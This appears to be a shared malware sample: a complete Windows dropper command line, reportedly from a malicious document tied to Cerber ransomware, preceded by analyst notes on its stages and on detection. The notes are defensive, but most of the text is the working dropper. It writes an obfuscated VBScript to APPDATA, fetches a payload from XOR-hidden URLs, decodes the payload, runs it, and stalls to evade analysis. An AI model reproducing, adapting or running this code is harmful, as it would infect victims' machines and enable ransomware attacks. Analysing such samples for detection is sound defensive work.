
@spnow
Forked from trietptm/dropper.INFECTED.bat
Created August 17, 2016 17:49
Command-line execution acting as a dropper, found inside a malicious document (probably Cerber ransomware)
REM Analyst notes on the dropper command line below; the sample text itself is left unmodified.
REM
REM Stage 1 (cmd.exe): the /V switch enables delayed environment-variable expansion, so the
REM random value stored in FKO by 'set FKO=RANDOM' can be read back in its delayed form after
REM the set has run. The for-loop treats every quoted item as one line of VBScript; the tilde
REM modifier on the loop variable strips the surrounding quotes before echo emits it. The
REM combined output is redirected into a .vbs file under APPDATA whose base name is that
REM random number, the file is launched with 'start' (the .vbs file association, normally
REM wscript.exe, executes it), and the shell exits.
REM
REM Stage 2 (the written VBScript), limited to what the visible text establishes:
REM  - 'On Error Resume Next' appears in several routines, so failed calls are silent.
REM  - The 'NAME=N+N' items between statements are dead padding.
REM  - The script entry point is the bare call to Bu1P5, which reaches NEWtZ only after a
REM    ~9.3e7-iteration counting loop completes and a 4-second Timer wait.
REM  - SHpwygLQgHdJ(hexstr, key) is the string decoder: Chr(38) and Chr(72) form the
REM    ampersand-H hex prefix, each decoded byte is XORed with a key character through Du8g
REM    (written as (a AND NOT b) OR (NOT a AND b), i.e. XOR). Every CreateObject argument,
REM    Open verb and target, and setRequestHeader value goes through it, so none of them
REM    appear in cleartext here.
REM  - GdBocmWra2bHN and NEWtZ create COM objects and call Open, setRequestHeader and Send,
REM    then branch on StatusText; the method names are consistent with an HTTP request
REM    object, and NEWtZ tries a second decoded Open target when the first StatusText check
REM    fails (presumably a fallback location).
REM  - Of1VsR writes the ResponseBody to disk (Type=1, Open, Write, SaveToFile ... ,2) at
REM    LXZxe0, a path built from ExpandEnvironmentStrings of a decoded string plus the
REM    current Second(Time) value repeated. B4uerIC then calls QRvh2hg4Gd, which reads that
REM    file one character at a time and writes an XOR-decoded copy (key bytes from W6k35) to
REM    H7a3, and finally invokes .Run on a further decoded COM object with a decoded command
REM    string followed by the quoted H7a3 path - presumably executing the decoded file.
REM  - Stalling and evasion: XAzxIIf59A(n) busy-waits n seconds on Timer; BsBLNgj1dO spins
REM    through ~1e6 iterations of arithmetic; PEIwKPwhVFEYy2a is a 'Do While' loop whose
REM    exit variable is never assigned, so the script hangs instead of erroring when the
REM    StatusText check in GdBocmWra2bHN fails. LjUTifDPW5P is called but never defined
REM    (swallowed by On Error Resume Next); U7O3k6Up2H6Rh is compared but never assigned.
REM
REM Detection and mitigation hooks visible in this text: cmd.exe started with /V /C whose
REM command line contains a 'for ... do @echo' construct redirected into a .vbs under APPDATA,
REM immediately followed by 'start' of that file; a script host process whose argument is an
REM all-numeric .vbs name in APPDATA; and, since the sample reportedly came from a malicious
REM document, a script host spawned beneath a document-handling application. Application
REM control that denies script hosts running files from user-writable paths stops stage 1.
REM
REM NOTE(review): the command below appears to have been wrapped onto several lines when it
REM was pasted (one break falls inside the quoted 'if' item); the original is a single line.
cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT" "QEyWYC90=79+36" "FoHwraR="VSkUvLrA3gU"" "TdruWrPj3exh=55+60" "Set TlmAoztjgrep3nIj2=cREATEOBjecT(SHpwygLQgHdJ("043836042502351D343D333F07",FoHwraR))" "Ym5o74mmAmks5a=20+38" "BsBLNgj1dO" "ONEbMPRIwIYVMsYd1=63+56" "GdBocmWra2bHN" "P3GC43MG=28+88" "LXZxe0=TlmAoztjgrep3nIj2.ExPAndEnVironMENTStRINgs(SHpwygLQgHdJ("64361E2A2B0C362864","IAWnZOmB"))&"\"& QdJx9Z1PDLYQ8g & QdJx9Z1PDLYQ8g" "MNN6jdyTPO=30+72" "KzSFDJqxxi64="GJcYdlQRy"" "MTElyRNTSoABctWc8=42+9" "Set Umdr3G2bHN=creAteoBjecT(SHpwygLQgHdJ("070A3A1603223D1F33643B142824050629",KzSFDJqxxi64))" "QtIwMHSjI=81+18" "Umdr3G2bHN.oPeN SHpwygLQgHdJ("0C0A05","IKOQnjVPDn30N"),SHpwygLQgHdJ("31164D3103686E201E261227740650324D352832043F0B2D374C5A2E5468297E1B3B057D1B0972125C2B026132185F","BYb9A9GAPqKb") & QdJx9Z1PDLYQ8g,0" "FSiBQ=78+88" "Umdr3G2bHN.seTREQUEStheADeR SHpwygLQgHdJ("6A14285E0B","G8uF9nImsN7246"),SHpwygLQgHdJ("36133F0C45046C7C7D6747","LTjKi69XD")" "UV5RE9=87+45" "Umdr3G2bHN.SenD()" "YA9rp=9+48" "if 
Umdr3G2bHN.STaTuStExt=SHpwygLQgHdJ("3D1943402406344D3B5E5A39023619","Xmx14Mg") then" "MVKEbiLhvOYXdt=41+76" "BsBLNgj1dO" "R77jT20mAl=97+80" "XAzxIIf59A(4)" "AuBRD=83+25" "Of1VsR Umdr3G2bHN.reSPonSEBoDy" "CmxJlsgoTF=71+68" "Else" "AGYiQ=55+44" "JyU1NQwdLZlhoO="EonTcLOXMcQ"" "RPNWGCtUdUGKjfYLF=1+9" "SeT Umdr3G2bHN= CrEateoBJect(SHpwygLQgHdJ("22073711233C372B177F1D22221C37181F",JyU1NQwdLZlhoO))" "AAwhpMSp=43+7" "Umdr3G2bHN.oPen SHpwygLQgHdJ("200102","HgDVMMe2ev46Kgey2"),SHpwygLQgHdJ("321D4C257E78751A4D3B33362304593B2B25740A57386B3133055D676A3D2A0E071017243E3A001B2E633E1005","WZi8UD" ) & QdJx9Z1PDLYQ8g,0" "AG27Z=19+92" "Umdr3G2bHN.sETREQueSTHeadER SHpwygLQgHdJ("2A170A0404","SxvdcaNZswpqyS"),SHpwygLQgHdJ("0C09063D290F4253687E43","MnprXZ2vkY")" "SsvbqEur5CeeUh=77+89" "Umdr3G2bHN.SeND()" "R1xYoHleisTo86Wj=96+32" "If Umdr3G2bHN.STATuSTEXt=SHpwygLQgHdJ("022404040A151945173D2B02150D00","TREvpctue") thEn Of1VsR Umdr3G2bHN.reSPoNseBodY" "FvCs=53+62" "C0ucSy=55+46" "end if" "UJ8IbIVsCFjGv=56+15" "End Sub" "FuNcTiON QRvh2hg4Gd(STSvfidscYgrH0,NfHDcnoa)" "JlgsrLdhT6=37+48" "DiM Ib1AQqXCuyWo,SIaIRO8VhaIygi,DUPsa2OPa6MO,M15MngdUQi,RHjfxvqFtnGJx6,W6k35(7)" "QXTAUWhLniqc4u=45+50" "W6k35(0)=97" "W6k35(1)=107" "W6k35(2)=99" "W6k35(3)=101" "W6k35(4)=104" "W6k35(5)=99" "W6k35(6)=115" "W6k35(7)=106" "R01E5YnKt=22+57" "SEt SIaIRO8VhaIygi =crEATEobjECT(SHpwygLQgHdJ("102A1C3320172C3F0F6609080911193A3A1A3F3D2C273B0D2B3B", "JCInZPcEQhHOaet"))" "N1ZyOBMySAyS=65+75" "SeT DUPsa2OPa6MO=SIaIRO8VhaIygi.Getfile(STSvfidscYgrH0)" "FWk6zAXpGoTmS=10+95" "seT RHjfxvqFtnGJx6=DUPsa2OPa6MO.OpeNAsTeXTSTREAM(1,0)" "EQtO3nqfhh=70+22" "SEt M15MngdUQi=SIaIRO8VhaIygi.CReAtETextfilE(NfHDcnoa,1,0)" "TPvgroNba=71+19" "Ib1AQqXCuyWo=0" "Ea68RWdtmnj6w=79+49" "Do UnTIl RHjfxvqFtnGJx6.ATEndofstrEAM" "Ib1AQqXCuyWo=(Ib1AQqXCuyWo+1)\8" "M15MngdUQi.wrItE PxNLb6j(Du8g(Dydlf6fkXhjn350uE(RHjfxvqFtnGJx6.rEad(1)),W6k35(Ib1AQqXCuyWo)))" "LOOp" "KQ0NNfK8i8r=64+65" "M15MngdUQi.clOse" "OgyRDn4ALksUn4esl=69+89" "RHjfxvqFtnGJx6.Close" 
"QRtiU1J=67+95" "sEt RHjfxvqFtnGJx6=nOThINg" "EczC8=84+18" "seT DUPsa2OPa6MO=NOtHING" "RnJCAwjTa=3+28" "SEt M15MngdUQi=nothinG" "CAYOJs7slQJ0RlQVodhri7=40+42" "sET SIaIRO8VhaIygi=nOtHIng" "H9mWbMHe7A=5+46" "EnD FuNCTiOn" "LVVcPIl6PGoY=74+39" "Bu1P5" "suB B4uerIC()" "IdzTaoCEyuSumF=22+9" "dIm A0HqsGYQ3ES,H7a3,UvRv1uwGkvKcGwXX,BWLaQAVnq7WMbor,U7O3k6Up2H6Rh" "RzE=56+6" "UvRv1uwGkvKcGwXX=""""" "GQRO90aBOzve=68+31" "BWLaQAVnq7WMbor=PxNLb6j(32)" "JBKe5WFU9tHQRB0=45+74" "H7a3=LXZxe0 & QdJx9Z1PDLYQ8g & SHpwygLQgHdJ("56453B08","Vx1")" "SXHtBwtg3hcNgGR=79+71" "QRvh2hg4Gd LXZxe0,H7a3" "Si0CfZifkorruN7f6=30+45" "iF U7O3k6Up2H6Rh="" tHEN XAzxIIf59A(4)" "PblmhOImGi=17+69" "A0HqsGYQ3ES="T5aE4ZgUiLZj63uQ5"" "W2LWCgQmOEbxu=47+8" "cREATeoBjeCt(SHpwygLQgHdJ("62322646331721471F320F5A5F",A0HqsGYQ3ES)).Run SHpwygLQgHdJ("2E25296513223678620B6D18221B010C6D","XMHMKvZS") & UvRv1uwGkvKcGwXX & UvRv1uwGkvKcGwXX & BWLaQAVnq7WMbor & UvRv1uwGkvKcGwXX & H7a3 & UvRv1uwGkvKcGwXX,0,0" "X0jyK=61+38" "eNd SUb" "sUb TfgjBtEZiAm1I()" "H1BQk7p7M1pFs4=60+76" "On eRrOR reSume Next" "QdddoSroz=21+73" "LjUTifDPW5P 7,48" "XYe0hGtR82a2=80+67" "Qrxs9L7UJ8B=12+35" "ENd suB" "SUb PEIwKPwhVFEYy2a()" "NLQmTuz=60+16" "dIM S5qttuaJ0U,CoFlwZrTgQR8a" "VYzmN7sYw2PYt9Y2w=47+82" "Do While S5qttuaJ0U<>1" "CoFlwZrTgQR8a=CoFlwZrTgQR8a+1" "LOop" "AkIvc2ytemMGF4=35+80" "eNd SUb" "FunctIoN PxNLb6j(LVTjxxr6NN)" "NLRirO3guUg0MUwnW=60+52" "PxNLb6j=Chr(LVTjxxr6NN)" "POockigWk=29+10" "ENd FUnCTiOn" "funCTION QdJx9Z1PDLYQ8g()" "J7KD5IG5B=35+66" "QdJx9Z1PDLYQ8g=seCOnD(tIme)" "N2hIYa8hHvK=57+88" "End FUnCTiON" "sUb BsBLNgj1dO()" "JxNNdd6Aj=87+95" "Dim Uxln, OrRdQHkBaoAN" "For Uxln = 94 To 1000431" "OrRdQHkBaoAN = XCwZVdAipi18 + 37 + 10 + 18" "Next" "Hl8jPQcxAz=90+2" "enD suB" "suB Of1VsR(VGw9XYHDe)" "KH2d7yuM9R=17+94" "diM QBqMBoy2SfS,BkNEYSuxkVIfhpelB" "R10LZYLfqJZ=95+94" "BkNEYSuxkVIfhpelB="C0GqqLK8udE"" "YqnbB5DIBqlS=14+67" "seT QBqMBoy2SfS=CReateOBJect(SHpwygLQgHdJ("71033E350E656B011620225D",BkNEYSuxkVIfhpelB))" "KdlHici=53+62" 
"QBqMBoy2SfS.TYpe=1" "Nl3Zm25B86Ewi9=68+42" "QBqMBoy2SfS.oPEn" "RDoexzj2=49+72" "QBqMBoy2SfS.wRIte VGw9XYHDe" "TCZDTlrW04S1rbn=85+26" "QBqMBoy2SfS.sAVEToFILE LXZxe0,2" "TfhhGtEXnwUt=23+14" "seT QBqMBoy2SfS=NOthING" "VErW=7+37" "B4uerIC" "QRvYW=67+95" "End SUb" "FUNcTION Dydlf6fkXhjn350uE(WIi9HKqVudnf)" "WeOF4=51+68" "Dydlf6fkXhjn350uE=Asc(WIi9HKqVudnf)" "OOJ7hrvcYhRpk=29+70" "eNd FunCTiON" "suB Bu1P5()" "Uwko=83+33" "Dim YggA0zfBf6KN,R2bDbGZfV6,T48owEXTn" "De4a9MhO2BydV=90+85" "YggA0zfBf6KN=92899767:R2bDbGZfV6=0:T48owEXTn=0" "VoW63HZpqkts=36+61" "For R2bDbGZfV6=1 To YggA0zfBf6KN" "T48owEXTn=T48owEXTn+1" "NExt" "R2rQ4TB=25+23" "If T48owEXTn=YggA0zfBf6KN tHen" "Q7LZYLjUqLgRSY0of=35+29" "XAzxIIf59A(4)" "BOjZBGYDyA=34+32" "NEWtZ" "HVKwqWDn=79+68" "elSe" "TI6hmBXVP7MD5=70+9" "ETxAnaqiO10=6+55" "eND If" "GsnHqSQ2=16+72" "eNd SUb" "fuNCTION SHpwygLQgHdJ(KPqtwjcR3,U8UIxOh8)" "Odxuh8R3165=24+38" "diM VhY88lgV,EweXK6b8,VA5QGfRz3Gw" "E0QisHZgJ5VifGUVJ=27+56" "FOr VhY88lgV=1 tO (LEn(KPqtwjcR3)/2)" "EweXK6b8=(PxNLb6j(38)&PxNLb6j(72)&(mID(KPqtwjcR3,(VhY88lgV+VhY88lgV)-1,2)))" "VA5QGfRz3Gw=(Dydlf6fkXhjn350uE(MId(U8UIxOh8,((VhY88lgV mOD Len(U8UIxOh8))+1),1)))" "SHpwygLQgHdJ=SHpwygLQgHdJ+PxNLb6j(Du8g(EweXK6b8,VA5QGfRz3Gw))" "nExt" "HsQQRXC16O3U1=72+79" "eND fuNctIoN" "sUB XAzxIIf59A(JrXcJ7NEiI)" "LxB5SSDMa6=23+80" "DiM JlfyVLcm7W" "UGOUlQQ=16+62" "JlfyVLcm7W=TiMEr+JrXcJ7NEiI" "dO whiLE TImer<JlfyVLcm7W" "lOOp" "IClSwnO0HG=37+46" "eNd SUb" "fuNcTIOn Du8g(IPIuieHVEn,NbuFsmanCpt)" "W8rSGAxnW6EurYUTP=5+42" "Du8g=(IPIuieHVEn aND nOt NbuFsmanCpt)Or(nOt IPIuieHVEn ANd NbuFsmanCpt)" "F1Mjvj=47+27" "enD fUNctiOn") do @echo %~i)>"%appdata%\!FKO!.vbs" && start "" "%appdata%\!FKO!.vbs" && exit